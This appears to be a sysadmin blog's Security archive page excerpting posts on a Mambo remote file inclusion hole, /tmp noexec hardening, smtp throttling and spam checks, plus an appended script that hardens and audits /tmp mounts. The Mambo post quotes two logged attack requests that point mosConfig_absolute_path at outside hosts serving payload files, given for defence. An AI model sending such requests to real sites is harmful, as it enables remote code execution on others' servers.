Archive for the ‘Security’ Category

Mambo mosConfig_absolute_path exploit & solution

Wednesday, December 16th, 2009

I know that not many people use Mambo these days, and most of them have upgraded to Joomla 1.5, but in case you happen to have one hosted on your server, there is a known vulnerability: attack scripts use the mosConfig_absolute_path variable to load malicious code from other web hosts, which gives them the ability to run scripts (that you surely don't want) on your server.

An example is requests like the following in the Apache access logs:

/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=mosConfig_absolute_path=http://www.rgboy.fi//spreadz.txt??

/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=http://forum.redglove.it//c.txt??

Securing/hardening /tmp is one thing, but it won't do the job on its own, and the rules for the latest mod_security are not at all easy to write; you have to be good with regular expressions.

What did the trick in my case was rewrite rules. (more…)

/tmp & /var/tmp noexec hardening without reboot

Saturday, November 28th, 2009

After discovering scripts running from my /tmp folder (on CentOS 5.x) I had to harden the directory.

The fastest way to harden your /tmp and /var/tmp without rebooting is the following:

In your /dev directory create an empty 2.5 GB file (a good size for web hosting servers with many websites).

# cd /dev
# dd if=/dev/zero of=tmppart bs=1024 count=2500000

We will now create an ext3 filesystem in our tmppart file.
(more…)

xinetd[#]: Deactivating service smtp due to excessive incoming connections. Restarting in 30 seconds.

Thursday, November 15th, 2007

This happened on a Plesk 8.x Linux (RH) server: the smtp service was up and running and the queue was very light, but smtp wouldn't accept any connections on port 25, even from localhost.

In /var/log/messages I saw this disturbing message:
xinetd[#]: Deactivating service smtp due to excessive incoming connections. Restarting in 30 seconds.

(more…)

How to check if someone is spamming from my server (Linux Plesk 8.x)

Tuesday, November 13th, 2007

If you see a lot of smtp connections, or your server constantly ends up on spam blacklists, you should check whether a bot is spamming through your server.

There are 2 cases of spamming through a box:

1) using insecure PHP forms that bots abuse
2) using an smtp connection from an outside client

This article is about the 2nd case,

(more…)

Get notified when root logs in.

Monday, October 29th, 2007

Edit the file /root/.bashrc and add the following lines: (more…)

How do I mount the /tmp partition with the ‘noexec’ option?

Tuesday, June 12th, 2007

It is recommended to create /tmp as a separate partition and mount it with the ‘noexec’ and ‘nosuid’ options.

(more…)
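The loopback /tmp procedure from the November 2009 post and the noexec/nosuid recommendation in this last post, carried through as an added example that is not the blog's own script: it creates the image with the post's dd command, formats it ext3, mounts it noexec,nosuid,nodev, and audits /proc/mounts to confirm the options took effect. The image path /dev/tmppart and its size come from the post; the /var/tmp symlink, the 1777 mode and the HARDEN_TMP switch are assumptions.

```shell
#!/bin/sh
# Added example (not the blog's own script): back /tmp with a loopback image
# mounted noexec,nosuid,nodev and audit the result from /proc/mounts.
# Assumed: image path and size from the post; the /var/tmp symlink is not in the excerpt.
set -eu
IMAGE=/dev/tmppart
OPTS=loop,noexec,nosuid,nodev

# fstab entry so the hardened mount survives a reboot ($1 = mount point).
tmp_fstab_line() {
    printf '%s %s ext3 %s 0 0\n' "$IMAGE" "$1" "$OPTS"
}

# Return 0 when a /proc/mounts line ($1) carries mount option $2.
# /proc/mounts fields: device mountpoint fstype options dump pass
mount_has_opt() {
    opt=$2
    set -- $1
    [ $# -ge 4 ] || return 1
    case ",$4," in
        *",$opt,"*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Audit: /tmp and /var/tmp (symlink resolved) must be noexec and nosuid.
check_tmp_mounts() {
    rc=0
    for mp in /tmp /var/tmp; do
        real=$(readlink -f "$mp" 2>/dev/null || echo "$mp")
        line=$(awk -v m="$real" '$2 == m' /proc/mounts | tail -n 1)
        for opt in noexec nosuid; do
            if mount_has_opt "$line" "$opt"; then echo "$mp: $opt ok"
            else echo "$mp: $opt MISSING"; rc=1; fi
        done
    done
    return $rc
}

# Root-only: the post's dd command, then format, mount and persist.
harden_tmp() {
    dd if=/dev/zero of="$IMAGE" bs=1024 count=2500000
    mkfs.ext3 -F "$IMAGE"            # -F: skip the "not a block device" prompt
    mount -o "$OPTS" "$IMAGE" /tmp
    chmod 1777 /tmp                  # sticky, world-writable like stock /tmp
    mv /var/tmp /var/tmp.old; ln -s /tmp /var/tmp   # assumed /var/tmp handling
    tmp_fstab_line /tmp >>/etc/fstab
}

if [ "${HARDEN_TMP:-0}" = 1 ] && [ "$(id -u)" -eq 0 ]; then harden_tmp; fi
[ -r /proc/mounts ] && check_tmp_mounts || echo "warning: /tmp not fully hardened"
```

Run it without HARDEN_TMP to get an audit only; a "MISSING" line means a script dropped into that directory can still be executed.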